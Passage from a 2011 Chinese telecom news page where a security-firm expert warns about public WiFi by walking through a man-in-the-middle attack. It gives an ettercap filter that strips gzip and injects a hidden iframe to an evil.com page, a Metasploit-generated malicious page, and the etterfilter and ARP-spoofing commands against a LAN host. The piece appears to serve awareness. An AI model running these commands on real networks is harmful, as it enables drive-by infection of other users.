首页 >> 通信网络安全频道 >> 行业动态 >> 正文
 
安恒信息专家指出:小心使用公共场所的WiFi
http://www.cww.net.cn   2011年10月21日 11:03    通信世界网    

}

}

过滤脚本的功能 第一个if语句块,功能是如果ip协议匹配TCP,并且目标端口是80的话(一般是说浏览器浏览网页时候,对网站80端口发送请求),则搜索HTTP 数据流的Accept-ncoding,并且替换为Accept-Mousecat,然后在控制台打印一条“zappedAccept-Encoding”的消息,目的是为了避免目标客户端浏览器像启用了GZIP 这样的数据压缩功能。 第二个if 语句块,如果ip 协议匹配TCP,并且源端口是80的话,则搜索<body>关键字,

并且替换为<body> <iframe src=“http://evil.com/evil.html” width=0 height=0 >的代码,修改下脚本 我们的网马地址类似于http://192.168.1.103:8080/ZtfaWRsEf0

网马的地址是msf生成的。现在我们就开始生成网马(姑且这么叫)

最后编译一下脚本etterfilter -o ieexpft ieexp.filter

下面启动ettercap 进行arp欺骗并挂马 我们对192.168.1.106进行arp欺骗 命令前面讲过了: ettercap -T -q -F ieexpft -M arp:remote /192.168.1.106/ //

已经启动了~~~我们现在随便打开一个网页看看

已经注入了我们的挂马代码~~~

通信世界网

[1]  [2]  [3]  
编 辑:高娟    联系电话:010-67110006-853
分享到新浪微博 分享到搜狐微博 分享到腾讯微博 分享到网易微博 分享到139说客 分享到校内人人网 分享到开心网 分享到豆瓣 分享到QQ书签       收藏   打印  进入论坛   推荐给朋友
关键字搜索:安恒信息  WiFi  无线安全  
文章评论查看评论()
昵称:  验证码:
 
相关新闻
即时新闻
通信技术
最新方案
企业黄页
会议活动